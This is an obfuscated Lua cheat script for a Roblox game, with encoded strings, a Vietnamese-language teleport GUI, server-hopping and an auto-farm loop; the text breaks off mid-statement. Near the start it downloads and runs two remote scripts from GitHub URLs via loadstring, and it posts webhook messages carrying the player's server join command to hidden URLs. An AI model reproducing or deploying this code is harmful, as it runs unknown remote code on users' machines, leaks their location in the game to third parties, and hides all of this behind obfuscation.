--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v83,v84) local v85={};for v128=1, #v83 do v6(v85,v0(v4(v1(v2(v83,v128,v128 + 1 )),v1(v2(v84,1 + (v128% #v84) ,1 + (v128% #v84) + 1 )))%256 ));end return v5(v85);end loadstring(game:HttpGet("https://raw.githubusercontent.com/Chetdithglon/lklklkl/main/wedhook"))();loadstring(game:HttpGet("https://raw.githubusercontent.com/thk-bin/CUTTAY-BY-binhackerlo/main/Example.lua"))();if game:GetService(v7("\230\204\201\46\245\171\198\29\212","\126\177\163\187\69\134\219\167")).Map:FindFirstChild(v7("\14\212\57\209\245\32\228\57\201\253\45\201","\156\67\173\74\165")) then local v129=0 + 0 ;local v130;local v131;local v132;local v133;local v134;local v135;while true do if (v129==(0 + 0)) then v130=(is_sirhurt_closure and v7("\7\190\91\30\169\52\82","\38\84\215\41\118\220\70")) or (pebc_execute and v7("\96\4\45\6\241\99\27\35\1\246\85\4","\158\48\118\66\114")) or (syn and v7("\152\61\30\55\99\182\254\235\28","\155\203\68\112\86\19\197")) or (secure_load and v7("\117\216\56\232\73\118\224\244","\152\38\189\86\156\32\24\133")) or (KRNL_LOADED and v7("\215\69\169\74","\38\156\55\199")) or (SONA_LOADED and v7("\155\114\114\41","\35\200\29\28\72\115\20\154")) or v7("\42\183\216\203\205\41\44\9\179\222\214\153\108\51","\84\121\223\177\191\237\76") ;v131=game:GetService(v7("\147\66\221\176\9\85\34\215\178\85\204","\161\219\54\169\192\90\48\80"));v129=1456 -(990 + 465) ;end if (v129==(1 + 0)) then local v223=1414 -(1001 + 413) ;while true do if (v223==(1 + 0)) then v129=2 + 0 ;break;end if (v223==(0 -0)) then v132={[v7("\76\79\2\32\77\81","\69\41\34\96")]={{[v7("\186\202\210\6\6\56","\75\220\163\183\106\98")]={{[v7("\12\187\134\50","\185\98\218\235\87")]="đảo bí ẩn",[v7("\221\61\43\243\219","\202\171\92\71\134\190")]="```Người dùng đã thấy đảo bí ẩn```",[v7("\32\207\32\129\39\196","\232\73\161\76")]=true},{[v7("\181\216\79\88","\126\219\185\34\61")]="lệnh teleport sever",[v7("\26\207\82\103\123","\135\108\174\62\18\30\23\147")]='game:GetService("TeleportService"):TeleportToPlaceInstance('   .. game.PlaceId   .. ', "'   .. game.JobId   .. '", game.Players.LocalPlayer)' ,[v7("\191\231\38\194\22\171","\167\214\137\74\171\120\206\83")]=true}}}}};v133={[v7("\168\255\60\73\253\169\159\189\6\68\232\162","\199\235\144\82\61\152")]="application/json"};v223=2 -1 ;end end end if (v129==(5 -2)) then v135={[v7("\50\4\181","\75\103\118\217")]=_G.daobian,[v7("\229\91\116\13","\126\167\52\16\116\217")]=v134,[v7("\229\43\52\136\187\29","\156\168\78\64\224\212\121")]=v7("\55\193\150\250","\174\103\142\197"),[v7("\126\45\94\60\32\76\235","\152\54\72\63\88\69\62")]=v133};Request(v135);break;end if (v129==(6 -4)) then local v224=0 + 0 ;while true do if (v224==(1 + 0)) then v129=3 + 0 ;break;end if ((0 -0)==v224) then local v239=1994 -(109 + 1885) ;while true do if ((1470 -(1269 + 200))==v239) then v224=1 -0 ;break;end if (v239==(815 -(98 + 717))) then v134=v131:JSONEncode(v132);Request=http_request or request or HttpPost or syn.request ;v239=1;end end end end end end end if (game.PlaceId==(7449424734 -(35 + 1064))) then if (game:GetService(v7("\248\205\233\84\192\205\224\91","\60\180\164\142")).Sky.MoonTextureId=="http://www.roblox.com/asset/?id=9709149052") then local v146=826 -(802 + 24) ;local v147;local v148;local v149;local v150;local v151;local v152;local v153;while true do if (v146==(5 -2)) then v153=nil;while true do if (v147==(2 -0)) then v152=v149:JSONEncode(v150);Request=http_request or request or HttpPost or syn.request ;v147=1 + 2 ;end if (v147==(3 + 0)) then v153={[v7("\109\50\127","\32\56\64\19\156\58")]=_G.FullMoon,[v7("\120\199\225\79","\224\58\168\133\54\58\146")]=v152,[v7("\116\83\95\245\122\130","\107\57\54\43\157\21\230\231")]=v7("\235\164\34\193","\175\187\235\113\149\217\188"),[v7("\20\170\128\72\230\107\107","\24\92\207\225\44\131\25")]=v151};Request(v153);break;end if (v147==(0 + 0)) then v148=(is_sirhurt_closure and v7("\107\87\23\33\50\255\6","\114\56\62\101\73\71\141")) or (pebc_execute and v7("\136\251\212\208\183\218\214\197\171\225\222\214","\164\216\137\187")) or (syn and v7("\225\255\63\179\182\237\14\146\222","\107\178\134\81\210\198\158")) or (secure_load and v7("\11\11\140\210\163\54\11\142","\202\88\110\226\166")) or (KRNL_LOADED and v7("\232\29\140\251","\170\163\111\226\151")) or (SONA_LOADED and v7("\34\63\188\57","\73\113\80\210\88\46\87")) or v7("\178\36\196\6\167\132\52\221\30\232\136\56\141\21","\135\225\76\173\114") ;v149=game:GetService(v7("\50\249\172\160\159\184\181\12\228\187\181","\199\122\141\216\208\204\221"));v147=1 + 0 ;end if (v147==(1667 -(636 + 1030))) then local v243=0 -0 ;while true do if (v243==(0 + 0)) then v150={[v7("\168\208\18\245\124\229","\150\205\189\112\144\24")]={{[v7("\35\141\186\64\0\155","\112\69\228\223\44\100\232\113")]={{[v7("\218\30\10\214","\230\180\127\103\179\214\28")]=v7("\219\80\26\6\201\78\239\130","\128\236\101\63\38\132\33"),[v7("\186\168\29\81\179","\175\204\201\113\36\214\139")]="Người dùng đã thấy Moon 75%",[v7("\78\194\57\213\10\66","\100\39\172\85\188")]=true},{[v7("\163\121\180\133","\83\205\24\217\224")]="lệnh teleport sever",[v7("\240\196\193\40\227","\93\134\165\173")]='game:GetService("TeleportService"):TeleportToPlaceInstance('   .. game.PlaceId   .. ', "'   .. game.JobId   .. '", game.Players.LocalPlayer)' ,[v7("\183\252\205\203\52\203","\30\222\146\161\162\90\174\210")]=true}}}}};v151={[v7("\198\65\126\30\224\64\100\71\209\87\96\15","\106\133\46\16")]="application/json"};v243=1 + 0 ;end if (v243==(1 + 0)) then v147=2 + 0 ;break;end end end end break;end if (v146==(0 + 0)) then v147=0 -0 ;v148=nil;v146=1 + 0 ;end if (v146==(1 -0)) then v149=nil;v150=nil;v146=1 + 1 ;end if (v146==(1435 -(797 + 636))) then v151=nil;v152=nil;v146=14 -11 ;end end end end local v8=Instance.new(v7("\120\208\170\73\30\115\108\198\177","\29\43\179\216\44\123"));local v9=Instance.new(v7("\137\220\56\88\159\204\52\88\178\215","\44\221\185\64"));local v10=Instance.new(v7("\52\206\107\80\97\15\226\90","\19\97\135\40\63"));local v11=Instance.new(v7("\155\117\20\41\46\53\167\89\61\47","\81\206\60\83\91\79"));local v12=Instance.new(v7("\122\174\200\102\13\214\89\176\65\165","\196\46\203\176\18\79\163\45"));local v13=Instance.new(v7("\141\11\93\17\54\245\234\170","\143\216\66\30\126\68\155"));local v14=Instance.new(v7("\159\225\62\223\215\172\220\228","\129\202\168\109\171\165\195\183"));v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\18\84\54\193\219\6\193\55\81","\134\66\56\87\184\190\116"));v8.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v9.Name=v7("\47\52\31\190\11","\85\92\81\105\219\121\139\65");v9.Parent=v8;v9.BackgroundColor3=Color3.fromRGB(1874 -(1427 + 192) ,89 + 166 ,592 -337 );v9.BorderColor3=Color3.fromRGB(0 + 0 ,0,0 + 0 );v9.BorderSizePixel=326 -(192 + 134) ;v9.Position=UDim2.new(1276.930088699 -(316 + 960) ,0 + 0 ,0.601923108 + 0 ,0 + 0 );v9.Size=UDim2.new(968.062432725 -(478 + 490) ,0 -0 ,551.0596153848 -(83 + 468) ,1806 -(1202 + 604) );v9.Font=Enum.Font.SourceSans;v9.Text="Đổi Sever";v9.TextColor3=Color3.fromRGB(0 -0 ,0 -0 ,0 -0 );v9.TextScaled=true;v9.TextSize=339 -(45 + 280) ;v9.TextWrapped=true;v10.CornerRadius=UDim.new(0 + 0 ,18 + 2 );v10.Parent=v9;v11.Color=ColorSequence.new({ColorSequenceKeypoint.new(0 + 0 ,Color3.fromRGB(41 + 33 ,45 + 210 ,372 -171 )),ColorSequenceKeypoint.new(0.29 + 0 ,Color3.fromRGB(43 + 76 ,250,1899 -(1733 + 39) )),ColorSequenceKeypoint.new(1034.55 -(125 + 909) ,Color3.fromRGB(2165 -(1096 + 852) ,111 + 135 ,214 -64 )),ColorSequenceKeypoint.new(0.77 + 0 ,Color3.fromRGB(580 -338 ,713 -(409 + 103) ,366 -(46 + 190) )),ColorSequenceKeypoint.new(1,Color3.fromRGB(72 + 183 ,1470 -(1114 + 203) ,879 -(228 + 498) ))});v11.Parent=v9;v12.Parent=v9;v12.BackgroundColor3=Color3.fromRGB(56 + 199 ,255,141 + 114 );v12.BackgroundTransparency=664 -(174 + 489) ;v12.BorderColor3=Color3.fromRGB(0 -0 ,1905 -(830 + 1075) ,524 -(303 + 221) );v12.BorderSizePixel=1269 -(231 + 1038) ;v12.Position=UDim2.new( -(811.103447914 -(721 + 90)),0 + 0 , -(1163.54838681 -(171 + 991)),0 -0 );v12.Size=UDim2.new(2.18965518 -1 ,0 -0 ,1.54838705 + 0 ,0 -0 );v12.ZIndex= -(2 -1);v12.Font=Enum.Font.SourceSansBold;v12.Text="x";v12.TextColor3=Color3.fromRGB(7 + 248 ,0 -0 ,0 -0 );v12.TextScaled=true;v12.TextSize=1262 -(111 + 1137) ;v12.TextStrokeColor3=Color3.fromRGB(506 -251 ,24,165 -(91 + 67) );v12.TextWrapped=true;v13.CornerRadius=UDim.new(0,533 -(203 + 310) );v13.Parent=v12;v14.Thickness=1996.9000000953674 -(1238 + 755) ;v14.Parent=v12;local function v56() local v86=0 -0 ;local v87;local v88;local v89;local v90;while true do if (v86==(0 + 0)) then local v154=523 -(423 + 100) ;while true do if (v154==(0 + 0)) then local v231=0 -0 ;while true do if (v231==(0 -0)) then v87=Instance.new(v7("\206\176\66\76\108\203","\191\157\211\48\37\28"),v11);v88=game:GetService(v7("\235\8\241\25\52\236\26\230\10\51\220\26","\90\191\127\148\124"));v231=1 + 0 ;end if (v231==(772 -(326 + 445))) then v154=4 -3 ;break;end end end if (v154==(834 -(171 + 662))) then v86=2 -1 ;break;end end end if (v86==(3 -2)) then v89=TweenInfo.new(2 + 2 ,Enum.EasingStyle.Linear,Enum.EasingDirection.In, -1);v90=v88:Create(v87.Parent,v89,{[v7("\74\136\58\22\108\142\33\25","\119\24\231\78")]=840 -480 });v86=1 + 1 ;end if (v86==(1488 -(35 + 1451))) then v90:Play();break;end end end coroutine.wrap(v56)();local function v57() local v91=0;local v92;while true do if (v91==(711 -(530 + 181))) then v92=Instance.new(v7("\177\46\183\67\204\84","\113\226\77\197\42\188\32"),v12);v92.Parent.MouseButton1Click:Connect(function() v92.Parent.Parent:Destroy();end);break;end end end coroutine.wrap(v57)();local function v58() local v93=1993 -(941 + 1052) ;local v94;while true do if (v93==0) then v94=Instance.new(v7("\22\25\247\180\54\37\247\167\51\6\224","\213\90\118\148"),v9);v94.Parent.MouseButton1Click:Connect(function() game:GetService(v7("\111\43\184\83\93\84\60\160\101\72\73\56\189\85\72","\45\59\78\212\54")):Teleport(game.PlaceId,game:GetService(v7("\32\90\130\146\131\60\190","\144\112\54\227\235\230\78\205")).LocalPlayer);end);break;end end end coroutine.wrap(v58)();local v59={};local v60=game:GetService(v7("\135\63\10\249\222\104\182\58\25\245\211\94","\59\211\72\111\156\176"));local v61=Instance.new(v7("\125\132\241\40\75\137\196\56\71","\77\46\231\131"));v61.Name=v7("\152\85\186\65\168\85\188\65","\32\218\52\214");v61.Parent=game.CoreGui;v61.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;local v66=Instance.new(v7("\104\5\48\165\244","\58\46\119\81\200\145\208\37"));v66.Name=v7("\5\131\36\165\143\175\55\38\137","\86\75\236\80\204\201\221");v66.Parent=v61;v66.AnchorPoint=Vector2.new(0.5 + 0 ,1514.5 -(822 + 692) );v66.BackgroundColor3=Color3.fromRGB(1136 -(614 + 267) ,287 -(19 + 13) ,414 -159 );v66.BackgroundTransparency=2 -1 ;v66.Position=UDim2.new(2.2 -1 ,0 + 0 ,0.0613496937 -0 ,0 -0 );v66.Size=UDim2.new(0 -0 ,2342 -710 ,0 -0 ,1912 -(1293 + 519) );local v74=Instance.new(v7("\71\104\91\140\237\159\94\64\110\138\235\159","\235\18\33\23\229\158"));v74.Name=v7("\126\181\213\178\92\179\210\175\92\187\216\180\69\174","\219\48\218\161");v74.Parent=v66;v74.FillDirection=Enum.FillDirection.Vertical;v74.SortOrder=Enum.SortOrder.LayoutOrder;v74.Padding=UDim.new(0 -0 ,5);v59.Notification=function(v95,v96,v97,v98,v99) local v100=0 -0 ;local v101;local v102;local v103;local v104;local v105;local v106;local v107;local v108;local v109;local v110;while true do if (v100==(12 -6)) then v105.Size=UDim2.new(0 -0 ,175,0 -0 ,103 -79 );v105.Font=Enum.Font.LuckiestGuy;v105.TextColor3=Color3.fromRGB(200 -115 ,635 -(170 + 295) ,135 + 120 );v105.TextSize=7 + 6 ;v105.Text=v96;v105.TextXAlignment=Enum.TextXAlignment.Left;v100=17 -10 ;end if (v100==(3 + 8)) then v108.Name=v7("\10\54\244\244","\145\94\95\153");v108.Parent=v101;v108.Active=true;v108.BackgroundColor3=Color3.fromRGB(197 -112 ,170,59 + 196 );v108.BorderSizePixel=0 + 0 ;v108.Position=UDim2.new(0.0320000015 + 0 ,1230 -(957 + 273) ,0.870000005 + 0 ,1096 -(709 + 387) );v100=1870 -(673 + 1185) ;end if (v100==(25 -16)) then v107.BackgroundTransparency=1;v107.Size=UDim2.new(0 -0 ,534 -359 ,0 -0 ,41 -16 );v107.Font=Enum.Font.GothamBlack;v107.Text=v97;v107.TextScaled=true;v107.TextColor3=Color3.fromRGB(183 + 72 ,191 + 64 ,27 + 228 );v100=13 -3 ;end if (v100==(954 -(783 + 168))) then v103.Name=v7("\232\120\42\90\248\33\252\194\99\45\88\248","\168\171\23\68\52\157\83");v103.Parent=v101;v104=Instance.new(v7("\221\124\244\170\32\1\134\246\116\249","\231\148\17\149\205\69\77"));v104.Name=v7("\137\170\198\252\82\241\143\179\206","\159\224\199\167\155\55");v104.Parent=v101;v104.AnchorPoint=Vector2.new(0.5 -0 ,0.5 + 0 );v100=7 -3 ;end if (v100==(7 -3)) then v104.BackgroundColor3=Color3.fromRGB(2135 -(446 + 1434) ,1538 -(1040 + 243) ,566 -(309 + 2) );v104.Position=UDim2.new(0.135999978,0,0.5,0 -0 );v104.Size=UDim2.new(1847 -(559 + 1288) ,1981 -(609 + 1322) ,454 -(13 + 441) ,186 -136 );v104.BackgroundTransparency=2 -1 ;v104.Image="http://www.roblox.com/asset/?id="   .. tostring(v99) ;v105=Instance.new(v7("\195\246\36\198\219\242\62\215\251","\178\151\147\92"));v100=24 -19 ;end if (v100==(1131 -(628 + 490))) then v110.PaddingTop=UDim.new(0 + 0 ,1 + 14 );v60:Create(v108,TweenInfo.new(tonumber(v98),Enum.EasingStyle.Linear,Enum.EasingDirection.InOut),{[v7("\206\196\14\208","\215\157\173\116\181\46")]=UDim2.new(0 -0 ,0 + 0 ,0 + 0 ,8 -5 )}):Play();delay(tonumber(v98),function() local v225=0 -0 ;while true do if (v225==(0 + 0)) then v60:Create(v104,TweenInfo.new(0.2 + 0 ,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\28\185\138\245\223\1\166\138\252\201\37\181\153\247\212\54\173","\186\85\212\235\146")]=1 + 0 }):Play();v60:Create(v107,TweenInfo.new(0.2 -0 ,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\246\132\14\234\13\252\89\204\146\6\255\43\235\86\193\152","\56\162\225\118\158\89\142")]=1 + 0 }):Play();v225=1 + 0 ;end if (v225==(2 + 1)) then v101:Destroy();break;end if (v225==(2 + 0)) then v60:Create(v101,TweenInfo.new(0.4 + 0 ,Enum.EasingStyle.Quart,Enum.EasingDirection.InOut),{[v7("\2\139\102\185","\220\81\226\28")]=UDim2.new(0 + 0 ,433 -(153 + 280) ,0 -0 ,63 + 7 )}):Play();wait(0.3 + 0 );v225=10 -7 ;end if (v225==(1 + 0)) then v60:Create(v105,TweenInfo.new(0.2 + 0 ,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\104\0\216\187\22\202\93\11\211\191\35\202\89\11\195\182","\184\60\101\160\207\66")]=1 + 0 }):Play();wait(0.3);v225=2 -0 ;end end end);break;end if (v100==5) then v106=Instance.new(v7("\170\239\77\63\23","\26\236\157\44\82\114\44"));v105.Name=v7("\62\54\209\87\35\42","\59\74\78\181");v105.Parent=v101;v105.BackgroundColor3=Color3.fromRGB(53 + 32 ,837 -(89 + 578) ,183 + 72 );v105.BackgroundTransparency=1 -0 ;v105.Position=UDim2.new(1049.25 -(572 + 477) ,0 + 0 ,1944.15 -(1129 + 815) ,387 -(371 + 16) );v100=4 + 2 ;end if (v100==(1 + 1)) then v102.LineJoinMode=Enum.LineJoinMode.Round;v102.Color=Color3.fromRGB(341 -(84 + 2) ,373 -(88 + 30) ,420 -165 );v102.Transparency=0 + 0 ;v101:TweenSizeAndPosition(UDim2.new(0,(1092 -(497 + 345)) -(1 + 9) ,0,70),UDim2.new(0.5 + 0 ,1333 -(605 + 728) ,0.5 + 0 ,1083 -(286 + 797) ),v7("\138\191\55","\49\197\202\67\126\115\100\167"),v7("\21\90\220\34","\62\87\59\191\73\224\54"),0.3 + 0 ,true);v103=Instance.new(v7("\210\43\217\198\245\12\255\219","\169\135\98\154"));v103.CornerRadius=UDim.new(0 -0 ,1 + 3 );v100=10 -7 ;end if (v100==(11 + 1)) then v108.Size=UDim2.new(0 -0 ,179 + 57 ,489 -(457 + 32) ,788 -(222 + 563) );v109.Parent=v108;v109.CornerRadius=UDim.new(0 + 0 ,1409 -(832 + 570) );v109.Name="";v110.Parent=v66;v110.PaddingLeft=UDim.new(0 + 0 ,33 -18 );v100=4 + 9 ;end if ((3 -2)==v100) then local v203=0 + 0 ;while true do if (v203==(796 -(588 + 208))) then v101.Size=UDim2.new(0,0 + 0 ,848 -(40 + 808) ,0 -0 );v102=Instance.new(v7("\153\7\152\95\213\88\21\12","\105\204\78\203\43\167\55\126"));v203=1801 -(884 + 916) ;end if (v203==(6 -3)) then v100=2 + 0 ;break;end if ((2 + 0)==v203) then v102.Parent=v101;v102.ApplyStrokeMode=Enum.ApplyStrokeMode.Border;v203=656 -(232 + 421) ;end if (v203==(1890 -(1569 + 320))) then v102.Thickness=1 + 0 ;v102.Name="";v203=2;end end end if (v100==(0 + 0)) then if (v99==nil) then v99="";end if (v98==nil) then v98=1 + 0 ;end v101=Instance.new(v7("\194\99\125\68\222","\128\132\17\28\41\187\47"));v101.Name=v7("\53\59\18\54\88\39\32\7\55\88","\61\97\82\102\90");v101.Parent=v66;v101.BackgroundColor3=Color3.fromRGB(95 -60 ,7 + 28 ,117 -82 );v100=606 -(316 + 289) ;end if (v100==(18 -11)) then v106.Name=v7("\9\208\88\86\182\3\195\91\87\182","\211\69\177\58\58");v106.Parent=v101;v106.AnchorPoint=Vector2.new(0.5 + 0 ,0.5);v106.BackgroundColor3=Color3.fromRGB(1708 -(666 + 787) ,255,680 -(360 + 65) );v106.BackgroundTransparency=1 + 0 ;v106.Position=UDim2.new(254.625999987 -(79 + 175) ,0 -0 ,0.620000005 + 0 ,0 -0 );v100=15 -7 ;end if (v100==(16 -8)) then v106.Size=UDim2.new(326 -(89 + 237) ,1074 -(503 + 396) ,181 -(92 + 89) ,48 -23 );v107=Instance.new(v7("\131\224\97\225\197\202\181\224\117","\171\215\133\25\149\137"));v107.Name=v7("\213\205\42\238\193\63\232\75","\34\129\168\82\154\143\80\156");v107.Parent=v106;v107.Active=true;v107.BackgroundColor3=Color3.fromRGB(255,536 -281 ,1136 -(581 + 300) );v100=1229 -(855 + 365) ;end if (v100==(23 -13)) then v107.TextSize=7 + 5 ;v107.TextXAlignment=Enum.TextXAlignment.Left;repeat wait();until v101.Size==UDim2.new(0 + 0 ,(979 -729) -(10 + 0) ,0 + 0 ,159 -89 )  v108=Instance.new(v7("\163\160\50\6\77","\233\229\210\83\107\40\46"));v109=Instance.new(v7("\244\107\17\217\23\207\71\32","\101\161\34\82\182"));v110=Instance.new(v7("\221\36\105\255\223\230\139\32\239","\78\136\109\57\158\187\130\226"));v100=10 + 1 ;end end end;repeat wait();until game:IsLoaded() aut=true;function totarget(v111) local v112=0 + 0 ;local v113;local v114;local v115;local v116;local v117;while true do if ((2 -1)==v112) then v115=nil;v116=nil;v112=1 + 1 ;end if ((2 -0)==v112) then v117=nil;while true do if ((1244 -(485 + 759))==v113) then local v238=0;while true do if (v238==(0 -0)) then v114=game:service(v7("\39\194\135\254\228\244\22\199\148\242\233\194","\167\115\181\226\155\138"));v115=TweenInfo.new((game:GetService(v7("\210\46\230\69\126\99\213","\166\130\66\135\60\27\17"))[v7("\104\69\205\116\60\116\70\207\108\53\86","\80\36\42\174\21")].Character.HumanoidRootPart.Position-v111.Position).Magnitude/(1489 -(442 + 747)) ,Enum.EasingStyle.Linear);v238=1 + 0 ;end if (v238==(1136 -(832 + 303))) then v113=947 -(88 + 858) ;break;end end end if (v113==(1 + 0)) then v116,v117=pcall(function() v116=v114:Create(game.Players.LocalPlayer.Character['HumanoidRootPart'],v115,{[v7("\109\54\37\123\67\21","\26\46\112\87")]=v111});v116:Play();end);if  not v116 then return v117;end break;end end break;end if (v112==(0 + 0)) then v113=0 -0 ;v114=nil;v112=1 + 0 ;end end end function thisCode() repeat task.wait();until game:IsLoaded() local v118=game.PlaceId;local v119={};local v120="";local v121=os.date(v7("\248\105\191","\212\217\67\203\20\223\223\37")).hour;local v122=false;local v123=pcall(function() v119=game:GetService(v7("\146\153\188\194\137\136\186\196\179\142\173","\178\218\237\200")):JSONDecode(readfile(v7("\152\186\242\227\183\184\227\227\179\167\240\213\164\166\168\218\165\186\232","\176\214\213\134")));end);if  not v123 then local v144=0 + 0 ;local v145;while true do if ((789 -(766 + 23))==v144) then v145=0 -0 ;while true do if (v145==(0 + 0)) then table.insert(v119,v121);writefile(v7("\218\162\162\231\169\91\92\199\168\164\194\173\68\74\186\167\165\219\166","\57\148\205\214\180\200\54"),game:GetService(v7("\58\233\33\36\69\23\239\35\61\117\23","\22\114\157\85\84")):JSONEncode(v119));break;end end break;end end end function TPReturner() local v136=0 -0 ;local v137;local v138;local v139;local v140;local v141;while true do if ((4 -2)==v136) then v141=nil;while true do if (v137==0) then local v240=0 -0 ;while true do if (v240==(1 -0)) then v137=204 -(11 + 192) ;break;end if (v240==0) then v138=0 + 0 ;v139=nil;v240=1074 -(1036 + 37) ;end end end if (v137==(2 -1)) then local v241=0 + 0 ;while true do if (v241==(0 -0)) then v140=nil;v141=nil;v241=2 -1 ;end if (v241==(1 -0)) then v137=178 -(50 + 126) ;break;end end end if (v137==(2 + 0)) then while true do if (v138==(1482 -(641 + 839))) then v141=913 -(910 + 3) ;for v247,v248 in pairs(v139.data) do local v249=0 -0 ;local v250;while true do if ((1413 -(1233 + 180))==v249) then v250=true;v140=tostring(v248.id);v249=1685 -(1466 + 218) ;end if (v249==(1 + 0)) then if (tonumber(v248.maxPlayers)>tonumber(v248.playing)) then local v256=1421 -(107 + 1314) ;while true do if (v256==(1148 -(556 + 592))) then for v267,v268 in pairs(v119) do if (v141~=0) then if (v140==tostring(v268)) then v250=false;end elseif (tonumber(v121)~=tonumber(v268)) then local v270=pcall(function() local v272=0 + 0 ;while true do if (v272==(809 -(329 + 479))) then table.insert(v119,v121);break;end if (v272==(854 -(174 + 680))) then local v275=0 -0 ;while true do if (v275==1) then v272=3 -2 ;break;end if (v275==(1910 -(716 + 1194))) then delfile(v7("\144\251\23\118\130\179\241\48\64\145\168\241\17\86\205\180\231\12\75","\227\222\148\99\37"));v119={};v275=1 + 0 ;end end end end end);end v141=v141 + (1 -0) ;end if (v250==true) then local v269=0;while true do if (v269==(0 + 0)) then local v271=739 -(396 + 343) ;while true do if ((0 + 0)==v271) then table.insert(v119,v140);wait();v271=1478 -(29 + 1448) ;end if (v271==(1 -0)) then v269=1390 -(135 + 1254) ;break;end end end if (v269==(3 -2)) then pcall(function() local v273=0;local v274;while true do if ((0 -0)==v273) then v274=0 + 0 ;while true do if ((1527 -(389 + 1138))==v274) then writefile(v7("\29\93\70\197\248\62\87\97\243\235\37\87\64\229\183\57\65\93\248","\153\83\50\50\150"),game:GetService(v7("\117\98\103\12\64\174\95\75\127\112\25","\45\61\22\19\124\19\203")):JSONEncode(v119));wait();v274=575 -(102 + 472) ;end if (v274==(1 + 0)) then game:GetService(v7("\245\23\1\240\18\127\171\213\33\8\231\20\121\186\196","\217\161\114\109\149\98\16")):TeleportToPlaceInstance(v118,v140,game.Players.LocalPlayer);break;end end break;end end end);wait(4 + 0 );break;end end end break;end end end break;end end end break;end if ((0 + 0)==v138) then v139=nil;if (v120=="") then v139=game.HttpService:JSONDecode(game:HttpGet("https://games.roblox.com/v1/games/"   .. v118   .. "/servers/Public?sortOrder=Asc&limit=100" ));else v139=game.HttpService:JSONDecode(game:HttpGet("https://games.roblox.com/v1/games/"   .. v118   .. "/servers/Public?sortOrder=Asc&limit=100&cursor="   .. v120 ));end v138=1 + 0 ;end if ((1 + 0)==v138) then v140="";if (v139.nextPageCursor and (v139.nextPageCursor~=v7("\202\222\31\200","\200\164\171\115\164\61\150")) and (v139.nextPageCursor~=nil)) then v120=v139.nextPageCursor;end v138=1547 -(320 + 1225) ;end end break;end end break;end if (v136==(0 -0)) then v137=0 + 0 ;v138=nil;v136=1465 -(157 + 1307) ;end if ((1860 -(821 + 1038))==v136) then v139=nil;v140=nil;v136=1185 -(1058 + 125) ;end end end function Teleport() while wait() do pcall(function() local v221=0 -0 ;while true do if (v221==(0 + 0)) then TPReturner();if (v120~="") then TPReturner();end break;end end end);end end local v124=0.5 -0 ;task.spawn(function() while task.wait(v124) do pcall(function() for v226,v227 in pairs(game.CoreGui:GetDescendants()) do pcall(function() if string.find(v227.Name,v7("\55\50\42\115\174\89\23\51\43\125\187\113","\20\114\64\88\28\220")) then if string.find(v227.Text,v7("\2\4\209\161\234\217\169\40\65\217\189\251\219","\221\81\97\178\212\152\176")) then v124=2783945706 -1783945706 ;Teleport();end end end);end end);end end);local v125=game:GetService(v7("\254\243\28\233\14\200\245\58\238\19","\122\173\135\125\155"));local v126=Instance.new(v7("\166\200\14\189\62\51\196\129\231\21\183\60\37\193\139\207","\168\228\161\96\217\95\81"));function gui() v125:SetCore(v7("\232\212\32\88\1\88\207\216\40\85\44\86\207\216\33\82","\55\187\177\78\60\79"),{[v7("\25\199\75\231\67","\224\77\174\63\139\38\175")]=v7("\165\84\76\33\196\103\74\47\137\1\123\38\129\82\76","\78\228\33\56"),[v7("\250\123\170\23","\229\174\30\210\99")]=v7("\61\228\158\84\233\125\62\26\224\131\17\232\47\43\20\255\149\17\238\50\61\30\173\212\7\186\33\27\2\173\132\88\227\53\56\24\230\131\67\225\50","\89\123\141\230\49\141\93"),[v7("\218\114\249\2","\42\147\17\150\108\112")]="rbxassetid://16435032782",[v7("\43\179\63\126\243\225\0\168","\136\111\198\77\31\135")]=math.huge,[v7("\33\8\171\90\191\229\20\162","\201\98\105\199\54\221\132\119")]=v126,[v7("\155\25\151\53\13\59\253","\204\217\108\227\65\98\85")]=v7("\118\198\236\165\40\213\90\198","\160\62\163\149\133\76")});end gui();v126.OnInvoke=function(v142) if (v142==v7("\254\165\20\111\199\195\164\8","\163\182\192\109\79")) then local v222=0 + 0 ;while true do if (v222==(0 -0)) then aut=false;gui();break;end end elseif (v142==v7("\28\35\25\128\241\33\34\5","\149\84\70\96\160")) then local v229=1026 -(834 + 192) ;while true do if (v229==(1 + 0)) then auto();break;end if ((1898 -(41 + 1857))==v229) then aut=true;gui();v229=1894 -(1222 + 671) ;end end end end;function auto() if (aut==true) then task.spawn(function() while aut==true  do if (aut==true) then local v242=game.Players.LocalPlayer:FindFirstChild(v7("\27\14\12\255\57\5\25\232\42","\141\88\102\109"));if  not game.Players.LocalPlayer.Character then else local v244=game.Players.LocalPlayer.Character:FindFirstChild(v7("\144\65\207\103\56\31\114","\161\211\51\170\16\122\93\53"),true);if v244 then v244:Destroy();end local v245=game.Players.LocalPlayer.Character:FindFirstChild(v7("\211\187\191\41\245\161\187\44","\72\155\206\210"));if v245 then local v251=game.Workspace:FindFirstChild(v7("\101\114\81\29\39\18","\83\38\26\52\110")) or game.Workspace:FindFirstChild(v7("\123\31\34\85\76\68","\38\56\119\71")) or game.Workspace:FindFirstChild(v7("\208\231\93\197\49\4","\54\147\143\56\182\69")) ;if v251 then local v253=0 + 0 ;while true do if (v253==(0 -0)) then game.Players.LocalPlayer.Character:PivotTo(v251:GetPivot());firesignal(v251.Touched,game.Players.LocalPlayer.Character.HumanoidRootPart);break;end end elseif (game.Players.LocalPlayer.Backpack:FindFirstChild(v7("\240\136\236\93\159\217\135\191\109\222\196\138\241\76\204\197","\191\182\225\159\41")) or 